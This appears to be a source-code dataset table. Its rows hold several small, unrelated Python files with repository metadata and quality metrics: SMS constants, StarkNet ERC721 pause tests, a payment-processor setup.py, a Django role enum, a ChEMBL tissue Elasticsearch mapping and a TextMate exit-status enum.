hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fa41ceb73f01b6ed99614aa176053160f3a545b8 | 95 | py | Python | flask_api/celery_tasks/sms/constants.py | FanLgchen/Celery- | 409a609f476a84c421f718b9f1266c822bef1366 | [
"MIT"
] | 2 | 2020-06-18T09:39:13.000Z | 2020-10-05T03:11:33.000Z | flask_api/celery_tasks/sms/constants.py | FanLgchen/Celery- | 409a609f476a84c421f718b9f1266c822bef1366 | [
"MIT"
] | null | null | null | flask_api/celery_tasks/sms/constants.py | FanLgchen/Celery- | 409a609f476a84c421f718b9f1266c822bef1366 | [
"MIT"
] | null | null | null | # 短信签名
SMS_SIGN = 'demo'
# 短信验证码模板ID
SMS_VERIFICATION_CODE_TEMPLATE_ID = 'SMS_151231777'
| 15.833333 | 52 | 0.747368 | 12 | 95 | 5.416667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113924 | 0.168421 | 95 | 5 | 53 | 19 | 0.708861 | 0.147368 | 0 | 0 | 0 | 0 | 0.232877 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fa47561e4fca5e7d0a34320e88d5fab9b997b427 | 4,929 | py | Python | tests/test_ERC721_Pausable.py | georgercarder/cairo-contracts | b661e1b65686820fa020c47c3c29a4951bb04547 | [
"MIT"
] | null | null | null | tests/test_ERC721_Pausable.py | georgercarder/cairo-contracts | b661e1b65686820fa020c47c3c29a4951bb04547 | [
"MIT"
] | null | null | null | tests/test_ERC721_Pausable.py | georgercarder/cairo-contracts | b661e1b65686820fa020c47c3c29a4951bb04547 | [
"MIT"
] | null | null | null | import pytest
import asyncio
from starkware.starknet.testing.starknet import Starknet
from utils import Signer, str_to_felt, assert_revert
signer = Signer(123456789987654321)
# bools (for readability)
false = 0
true = 1
# random uint256 tokenIDs
first_token_id = (5042, 0)
second_token_id = (7921, 1)
third_token_id = (0, 13)
# random data (mimicking bytes in Solidity)
data = [str_to_felt('0x42'), str_to_felt('0x89'), str_to_felt('0x55')]
@pytest.fixture(scope='module')
def event_loop():
return asyncio.new_event_loop()
@pytest.fixture(scope='function')
async def erc721_factory():
starknet = await Starknet.empty()
owner = await starknet.deploy(
"contracts/Account.cairo",
constructor_calldata=[signer.public_key]
)
other = await starknet.deploy(
"contracts/Account.cairo",
constructor_calldata=[signer.public_key]
)
erc721 = await starknet.deploy(
"contracts/token/ERC721_Pausable.cairo",
constructor_calldata=[
str_to_felt("Non Fungible Token"), # name
str_to_felt("NFT"), # ticker
owner.contract_address # owner
]
)
erc721_holder = await starknet.deploy("contracts/token/utils/ERC721_Holder.cairo")
# mint tokens to owner
tokens = [first_token_id, second_token_id]
for token in tokens:
await signer.send_transaction(
owner, erc721.contract_address, 'mint', [
owner.contract_address, *token]
)
return starknet, erc721, owner, other, erc721_holder
@pytest.mark.asyncio
async def test_pause(erc721_factory):
_, erc721, owner, other, erc721_holder = erc721_factory
# pause
await signer.send_transaction(owner, erc721.contract_address, 'pause', [])
execution_info = await erc721.paused().call()
assert execution_info.result.paused == 1
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'approve', [
other.contract_address,
*first_token_id
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'setApprovalForAll', [
other.contract_address,
true
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'transferFrom', [
owner.contract_address,
other.contract_address,
*first_token_id
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'safeTransferFrom', [
owner.contract_address,
erc721_holder.contract_address,
*first_token_id,
len(data),
*data
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'mint', [
other.contract_address,
*third_token_id
])
)
@pytest.mark.asyncio
async def test_unpause(erc721_factory):
_, erc721, owner, other, erc721_holder = erc721_factory
# pause
await signer.send_transaction(owner, erc721.contract_address, 'pause', [])
# unpause
await signer.send_transaction(owner, erc721.contract_address, 'unpause', [])
execution_info = await erc721.paused().call()
assert execution_info.result.paused == 0
await signer.send_transaction(
owner, erc721.contract_address, 'approve', [
other.contract_address,
*first_token_id
]
)
await signer.send_transaction(
owner, erc721.contract_address, 'setApprovalForAll', [
other.contract_address,
true
]
)
await signer.send_transaction(
owner, erc721.contract_address, 'transferFrom', [
owner.contract_address,
other.contract_address,
*first_token_id
]
)
await signer.send_transaction(
other, erc721.contract_address, 'safeTransferFrom', [
owner.contract_address,
erc721_holder.contract_address,
*second_token_id,
len(data),
*data
]
)
await signer.send_transaction(
owner, erc721.contract_address, 'mint', [
other.contract_address,
*third_token_id
]
)
@pytest.mark.asyncio
async def test_only_owner(erc721_factory):
_, erc721, owner, other, _ = erc721_factory
# not-owner pause should revert
await assert_revert(signer.send_transaction(
other, erc721.contract_address, 'pause', []))
# owner pause
await signer.send_transaction(owner, erc721.contract_address, 'pause', [])
# not-owner unpause should revert
await assert_revert(signer.send_transaction(
other, erc721.contract_address, 'unpause', []))
# owner unpause
await signer.send_transaction(owner, erc721.contract_address, 'unpause', [])
| 27.082418 | 86 | 0.64435 | 519 | 4,929 | 5.863198 | 0.183044 | 0.167598 | 0.12422 | 0.128163 | 0.734473 | 0.701939 | 0.669077 | 0.667433 | 0.66579 | 0.645744 | 0 | 0.045791 | 0.260093 | 4,929 | 181 | 87 | 27.232044 | 0.788593 | 0.04788 | 0 | 0.526718 | 0 | 0 | 0.070115 | 0.026507 | 0 | 0 | 0.002565 | 0 | 0.076336 | 1 | 0.007634 | false | 0 | 0.030534 | 0.007634 | 0.053435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fa4b58e784df0a2ddab274bac344bf702ab449fb | 540 | py | Python | setup.py | ianhalpern/python-payment-processor | 64fb785373082da19a572097b738da4dd71bd985 | [
"MIT"
] | 12 | 2016-11-11T10:31:25.000Z | 2022-03-25T12:51:22.000Z | setup.py | ianhalpern/python-payment-processor | 64fb785373082da19a572097b738da4dd71bd985 | [
"MIT"
] | null | null | null | setup.py | ianhalpern/python-payment-processor | 64fb785373082da19a572097b738da4dd71bd985 | [
"MIT"
] | 3 | 2017-09-06T15:06:29.000Z | 2019-03-22T14:20:31.000Z | #!/usr/bin/python
from distutils.core import setup
setup(
name = 'payment_processor',
version = '0.2.0',
description = 'A simple payment gateway api wrapper',
author = 'Ian Halpern',
author_email = 'ian@ian-halpern.com',
url = 'https://launchpad.net/python-payment',
download_url = 'https://launchpad.net/python-payment/+download',
packages = (
'payment_processor',
'payment_processor.gateways',
'payment_processor.methods',
'payment_processor.exceptions',
'payment_processor.utils'
)
)
| 27 | 65 | 0.681481 | 61 | 540 | 5.901639 | 0.57377 | 0.266667 | 0.094444 | 0.111111 | 0.227778 | 0.227778 | 0.227778 | 0 | 0 | 0 | 0 | 0.006757 | 0.177778 | 540 | 19 | 66 | 28.421053 | 0.804054 | 0.02963 | 0 | 0 | 0 | 0 | 0.552581 | 0.195029 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3af9c8ef389a9995607211ee0514625e68a7c702 | 189 | py | Python | {{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/apps/profiles/choices.py | powerdefy/cookiecutter-django-rest | 8841d7c959e588f34f260405af167206eaf47376 | [
"MIT"
] | null | null | null | {{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/apps/profiles/choices.py | powerdefy/cookiecutter-django-rest | 8841d7c959e588f34f260405af167206eaf47376 | [
"MIT"
] | null | null | null | {{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/apps/profiles/choices.py | powerdefy/cookiecutter-django-rest | 8841d7c959e588f34f260405af167206eaf47376 | [
"MIT"
] | null | null | null | from django.db import models
class Role(models.IntegerChoices):
ADMIN = 0, 'Admin'
GENERAL = 1, 'General'
GUEST = 2, 'Guest'
ACCOUNTING = 3, 'Accounting'
IT = 4, 'IT'
| 18.9 | 34 | 0.613757 | 24 | 189 | 4.833333 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035461 | 0.253968 | 189 | 9 | 35 | 21 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0.153439 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3afe29425779a97835f8aa292d16b97d3ebe99af | 13,194 | py | Python | src/glados/es/ws2es/mappings_skeletons/es_chembl_tissue_mapping.py | chembl/GLaDOS | 044ed5f927b45dd5033c9383085ad5922c61f331 | [
"Apache-2.0"
] | 33 | 2017-09-21T11:38:44.000Z | 2022-03-19T06:41:47.000Z | src/glados/es/ws2es/mappings_skeletons/es_chembl_tissue_mapping.py | chembl/GLaDOS | 044ed5f927b45dd5033c9383085ad5922c61f331 | [
"Apache-2.0"
] | 739 | 2016-08-22T09:32:17.000Z | 2022-03-22T09:29:32.000Z | src/glados/es/ws2es/mappings_skeletons/es_chembl_tissue_mapping.py | chembl/GLaDOS | 044ed5f927b45dd5033c9383085ad5922c61f331 | [
"Apache-2.0"
] | 5 | 2020-06-12T01:51:41.000Z | 2021-09-17T10:32:53.000Z | # Elastic search mapping definition for the Molecule entity
from glados.es.ws2es.es_util import DefaultMappings
# Shards size - can be overridden from the default calculated value here
# shards = 3,
replicas = 1
analysis = DefaultMappings.COMMON_ANALYSIS
mappings = \
{
'properties':
{
'_metadata':
{
'properties':
{
'es_completion': 'TEXT',
# EXAMPLES:
# '{'weight': 100, 'input': 'Retina/plasma'}' , '{'weight': 10, 'input': 'CHEMBL3987832'}' , '{'weig
# ht': 10, 'input': 'UBERON:0001066'}' , '{'weight': 100, 'input': 'Intraorbital lacrimal gland'}' ,
# '{'weight': 10, 'input': 'CHEMBL3833873'}' , '{'weight': 10, 'input': 'CHEMBL3987959'}' , '{'weig
# ht': 10, 'input': 'CHEMBL3988202'}' , '{'weight': 10, 'input': 'BTO:0001442'}' , '{'weight': 10, '
# input': 'UBERON:0000200'}' , '{'weight': 100, 'input': 'Aortic valve'}'
'organism_taxonomy':
{
'properties':
{
'l1': 'TEXT',
# EXAMPLES:
# 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' ,
# 'Eukaryotes' , 'Eukaryotes' , 'Bacteria' , 'Bacteria'
'l2': 'TEXT',
# EXAMPLES:
# 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' ,
# 'Mammalia' , 'Gram-Positive' , 'Gram-Positive'
'l3': 'TEXT',
# EXAMPLES:
# 'Rodentia' , 'Primates' , 'Rodentia' , 'Rodentia' , 'Primates' , 'Lagomorpha' , 'Rodentia'
# , 'Rodentia' , 'Streptococcus' , 'Staphylococcus'
'oc_id': 'NUMERIC',
# EXAMPLES:
# '42' , '7' , '42' , '42' , '60' , '69' , '42' , '42' , '590' , '561'
'tax_id': 'NUMERIC',
# EXAMPLES:
# '10116' , '9606' , '10116' , '10116' , '9544' , '9986' , '10116' , '10116' , '1313' , '128
# 0'
}
},
'related_activities':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# '' , '' , '' , '' , '' , '' , '' , '' , '' , ''
'count': 'NUMERIC',
# EXAMPLES:
# '5' , '1' , '4' , '1' , '63' , '15' , '1' , '2' , '110' , '31'
}
},
'related_assays':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL3271354 CHEMBL3271351 CHEMBL3271352 CHEMBL3271353 CHEMBL3749611' , 'CHEMBL3266981'
# , 'CHEMBL3231741 CHEMBL3232032 CHEMBL3232142 CHEMBL3232050' , 'CHEMBL2212114' , 'CHEMBL102
# 2344 CHEMBL1275020 CHEMBL1274863 CHEMBL1274891 CHEMBL1274030 CHEMBL1022341 CHEMBL1011798 C
# HEMBL1019674 CHEMBL1274912 CHEMBL1274662 CHEMBL1017034 CHEMBL1274842 CHEMBL1274933 CHEMBL1
# 275069 CHEMBL1274558 CHEMBL1274898 CHEMBL1017033 CHEMBL1274849 CHEMBL1274565 CHEMBL1274593
# CHEMBL1274683 CHEMBL4000834 CHEMBL1011797 CHEMBL1274856 CHEMBL1274572 CHEMBL964747 CHEMBL
# 1275027 CHEMBL1274037 CHEMBL1274551 CHEMBL964745 CHEMBL1274926 CHEMBL1274919 CHEMBL1274690
# CHEMBL1275034 CHEMBL1274877 CHEMBL1274669 CHEMBL1275048 CHEMBL1274884 CHEMBL1017010 CHEMB
# L1017032 CHEMBL1022342 CHEMBL1022346 CHEMBL1017035 CHEMBL1275076 CHEMBL1275090 CHEMBL10170
# 09 CHEMBL1275062 CHEMBL1274579 CHEMBL1274905 CHEMBL1274676 CHEMBL1019675 CHEMBL1274586 CHE
# MBL964744 CHEMBL1274655 CHEMBL1022345 CHEMBL1275055 CHEMBL1011799 CHEMBL1275041 CHEMBL1275
# 083 CHEMBL1022343 CHEMBL964746 CHEMBL1274870 CHEMBL1274544' , 'CHEMBL3862853 CHEMBL3862825
# CHEMBL3862826' , 'CHEMBL3373694' , 'CHEMBL4054773 CHEMBL4054770' , 'CHEMBL1827722 CHEMBL3
# 583725 CHEMBL3389745 CHEMBL935349 CHEMBL3091242 CHEMBL3583724 CHEMBL3091255 CHEMBL3583723
# CHEMBL940282 CHEMBL3738486 CHEMBL1926063 CHEMBL1055389 CHEMBL1924493 CHEMBL3736923 CHEMBL3
# 736913 CHEMBL3583729 CHEMBL1924492 CHEMBL3738482 CHEMBL3737062 CHEMBL1924491 CHEMBL3389206
# CHEMBL1260643 CHEMBL935348 CHEMBL3389742 CHEMBL3389743 CHEMBL936043 CHEMBL3583728 CHEMBL1
# 805837 CHEMBL3606187 CHEMBL3389744 CHEMBL3736767 CHEMBL948103 CHEMBL1924490 CHEMBL940281 C
# HEMBL935351 CHEMBL3362796 CHEMBL935350 CHEMBL3606186 CHEMBL3389205 CHEMBL3583726 CHEMBL373
# 6765 CHEMBL1273661 CHEMBL1055388 CHEMBL1273660 CHEMBL1067241 CHEMBL1924489 CHEMBL935352 CH
# EMBL2214928 CHEMBL1067242' , 'CHEMBL994370 CHEMBL1218348 CHEMBL994358 CHEMBL994366 CHEMBL9
# 94362 CHEMBL994369 CHEMBL1218345 CHEMBL994359 CHEMBL1657220 CHEMBL1657221 CHEMBL1653373 CH
# EMBL1655162 CHEMBL994372 CHEMBL1218462 CHEMBL1654323 CHEMBL994371 CHEMBL1654028 CHEMBL1654
# 324 CHEMBL994368 CHEMBL1218349 CHEMBL1218341 CHEMBL994367 CHEMBL994363 CHEMBL1654322 CHEMB
# L994365 CHEMBL1654030 CHEMBL1654029'
'count': 'NUMERIC',
# EXAMPLES:
# '5' , '1' , '4' , '1' , '63' , '3' , '1' , '2' , '49' , '27'
}
},
'related_cell_lines':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL3833683' , 'CHEMBL3307768' , 'CHEMBL3307627' , 'CHEMBL3307355' , 'CHEMBL3307965' ,
# 'CHEMBL3307651' , 'CHEMBL3307762' , 'CHEMBL3307627' , 'CHEMBL3308019 CHEMBL3307570 CHEMBL3
# 307965 CHEMBL3307564' , 'CHEMBL3307383'
'count': 'NUMERIC',
# EXAMPLES:
# '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1' , '4' , '1'
}
},
'related_compounds':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL2420629 CHEMBL3746776 CHEMBL3260358' , 'CHEMBL3260771' , 'CHEMBL3229240 CHEMBL32292
# 38' , 'CHEMBL2203701' , 'CHEMBL395998 CHEMBL2017983 CHEMBL1270517' , 'CHEMBL2403888 CHEMBL
# 3922006 CHEMBL3895075 CHEMBL3948952 CHEMBL3905199 CHEMBL3933212 CHEMBL3906900 CHEMBL210573
# 5 CHEMBL3921126' , 'CHEMBL3358920' , 'CHEMBL4074669' , 'CHEMBL3604813 CHEMBL188635 CHEMBL1
# 922318 CHEMBL1922327 CHEMBL2441068 CHEMBL1922489 CHEMBL510944 CHEMBL1922481 CHEMBL2206420
# CHEMBL3086523 CHEMBL1922499 CHEMBL1922323 CHEMBL1922328 CHEMBL1923420 CHEMBL1922486 CHEMBL
# 1922494 CHEMBL3580908 CHEMBL3580926 CHEMBL1922490 CHEMBL1922336 CHEMBL3735824 CHEMBL497 CH
# EMBL1922480 CHEMBL1922337 CHEMBL1922326 CHEMBL1922482 CHEMBL1258462 CHEMBL581906 CHEMBL192
# 2333 CHEMBL1922315 CHEMBL1922496 CHEMBL1922477 CHEMBL1272278 CHEMBL1922321 CHEMBL1922316 C
# HEMBL1822871 CHEMBL1922484 CHEMBL1922487 CHEMBL1272227 CHEMBL1922332 CHEMBL1922330 CHEMBL4
# 5 CHEMBL286615 CHEMBL1922479 CHEMBL411440 CHEMBL1922478 CHEMBL1922322 CHEMBL161 CHEMBL3876
# 75 CHEMBL1922500 CHEMBL1922335 CHEMBL1922324 CHEMBL1922497 CHEMBL551359 CHEMBL3580919 CHEM
# BL1922491 CHEMBL1922317 CHEMBL1922325 CHEMBL1922493 CHEMBL1922331 CHEMBL1922319 CHEMBL1922
# 483 CHEMBL75267 CHEMBL465372 CHEMBL1922488 CHEMBL1922498 CHEMBL1922329 CHEMBL1922334 CHEMB
# L1800922 CHEMBL3580916 CHEMBL502 CHEMBL1922492 CHEMBL1922320 CHEMBL1922495 CHEMBL1922485 C
# HEMBL2206412' , 'CHEMBL262777 CHEMBL520642 CHEMBL501122 CHEMBL32 CHEMBL126 CHEMBL387675'
'count': 'NUMERIC',
# EXAMPLES:
# '3' , '1' , '2' , '1' , '3' , '9' , '1' , '1' , '76' , '6'
}
},
'related_documents':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL3745705 CHEMBL3259558' , 'CHEMBL3259671' , 'CHEMBL3227952' , 'CHEMBL2203285' , 'CHE
# MBL1151757 CHEMBL1268908 CHEMBL4000173' , 'CHEMBL3861981' , 'CHEMBL3352115' , 'CHEMBL40526
# 43' , 'CHEMBL3603820 CHEMBL1921774 CHEMBL3734674 CHEMBL1143818 CHEMBL3085641 CHEMBL1156916
# CHEMBL3351484 CHEMBL1151477 CHEMBL1255186 CHEMBL3352025 CHEMBL1149049 CHEMBL1821588 CHEMB
# L3580567 CHEMBL1142351 CHEMBL2203249 CHEMBL1921784 CHEMBL1800034 CHEMBL1269010' , 'CHEMBL1
# 155768 CHEMBL1649142 CHEMBL1649273 CHEMBL1212779'
'count': 'NUMERIC',
# EXAMPLES:
# '2' , '1' , '1' , '1' , '3' , '1' , '1' , '1' , '18' , '4'
}
},
'related_targets':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL612558 CHEMBL345' , 'CHEMBL1836' , 'CHEMBL612558' , 'CHEMBL612558' , 'CHEMBL612545
# CHEMBL612558' , 'CHEMBL612546' , 'CHEMBL376' , 'CHEMBL612545' , 'CHEMBL2574 CHEMBL375 CHEM
# BL612545 CHEMBL612546 CHEMBL612670 CHEMBL376 CHEMBL612558 CHEMBL613631 CHEMBL347' , 'CHEMB
# L352 CHEMBL374 CHEMBL362'
'count': 'NUMERIC',
# EXAMPLES:
# '2' , '1' , '1' , '1' , '2' , '1' , '1' , '1' , '9' , '3'
}
}
}
},
'bto_id': 'TEXT',
# EXAMPLES:
# 'BTO:0001442' , 'BTO:0001279' , 'BTO:0000156' , 'BTO:0001388' , 'BTO:0000928' , 'BTO:0000573' , 'BTO:00010
# 67' , 'BTO:0000493' , 'BTO:0004345' , 'BTO:0001063'
'caloha_id': 'TEXT',
# EXAMPLES:
# 'TS-0953' , 'TS-0099' , 'TS-1060' , 'TS-1307' , 'TS-0054' , 'TS-0394' , 'TS-0309' , 'TS-0813' , 'TS-1047'
# , 'TS-0469'
'efo_id': 'TEXT',
# EXAMPLES:
# 'EFO:0001914' , 'UBERON:0002240' , 'UBERON:0001348' , 'UBERON:0003126' , 'UBERON:0001637' , 'UBERON:000211
# 0' , 'UBERON:0002728' , 'UBERON:0000970' , 'UBERON:0001851' , 'UBERON:0000988'
'pref_name': 'TEXT',
# EXAMPLES:
# 'Retina/plasma' , 'Meningeal artery' , 'Intervertebral disk' , 'Intraorbital lacrimal gland' , 'Occipital
# lobe' , 'Sinoatrial node' , 'Ankle/Knee' , 'Brain ventricle' , 'Gyrus' , 'Aortic valve'
'tissue_chembl_id': 'TEXT',
# EXAMPLES:
# 'CHEMBL4296362' , 'CHEMBL3987832' , 'CHEMBL3987785' , 'CHEMBL3987787' , 'CHEMBL3833873' , 'CHEMBL3987959'
# , 'CHEMBL3988202' , 'CHEMBL4296347' , 'CHEMBL3987758' , 'CHEMBL3987638'
'uberon_id': 'TEXT',
# EXAMPLES:
# 'UBERON:0003474' , 'UBERON:0001066' , 'UBERON:0019324' , 'UBERON:0002021' , 'UBERON:0002351' , 'UBERON:000
# 4086' , 'UBERON:0000200' , 'UBERON:0002137' , 'UBERON:0001881' , 'UBERON:0002240'
}
}
| 66.301508 | 120 | 0.488176 | 796 | 13,194 | 8.050251 | 0.645729 | 0.029963 | 0.004682 | 0.020599 | 0.071161 | 0.071161 | 0.039326 | 0.008115 | 0 | 0 | 0 | 0.352382 | 0.417766 | 13,194 | 198 | 121 | 66.636364 | 0.481776 | 0.573821 | 0 | 0.259259 | 0 | 0 | 0.09695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012346 | 0 | 0.012346 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d71c193d332979ad562f8d1039609bbf9888baf0 | 1,366 | py | Python | tmi/api/io.py | fish2000/TMI | e849545644b99c132ecde24427531edd45213614 | [
"BSD-3-Clause"
] | null | null | null | tmi/api/io.py | fish2000/TMI | e849545644b99c132ecde24427531edd45213614 | [
"BSD-3-Clause"
] | null | null | null | tmi/api/io.py | fish2000/TMI | e849545644b99c132ecde24427531edd45213614 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import print_function
from enum import unique
import sys
from clu.enums import AliasingEnum, alias
from clu.exporting import Exporter
exporter = Exporter(path=__file__)
export = exporter.decorator()
@unique
class Status(AliasingEnum):
DISCARD = 200
REPLACE_TEXT = 201
REPLACE_DOCUMENT = 202
INSERT_TEXT = 203
INSERT_SNIPPET = 204
SHOW_HTML = 205
SHOW_TOOLTIP = 206
NEW_DOCUMENT = 207
INSERT_SNIPPET_NOINDENT = 208
NOP = alias(DISCARD)
CREATE_NEW_DOCUMENT = alias(NEW_DOCUMENT)
@property
def code(self):
return int(self.value)
def exit(self, output):
sys.stdout.write(output)
sys.stdout.flush()
sys.exit(self.code)
# Assign the modules’ `__all__` and `__dir__` using the exporter:
__all__, __dir__ = exporter.all_and_dir()
def test():
# from clu.testing.utils import inline
# @inline
def test_one():
pass # INSERT TESTING CODE HERE, pt. I
#@inline
def test_two():
pass # INSERT TESTING CODE HERE, pt. II
#@inline.diagnostic
def show_me_some_values():
pass # INSERT DIAGNOSTIC CODE HERE
# return inline.test(100)
if __name__ == '__main__':
sys.exit(test())
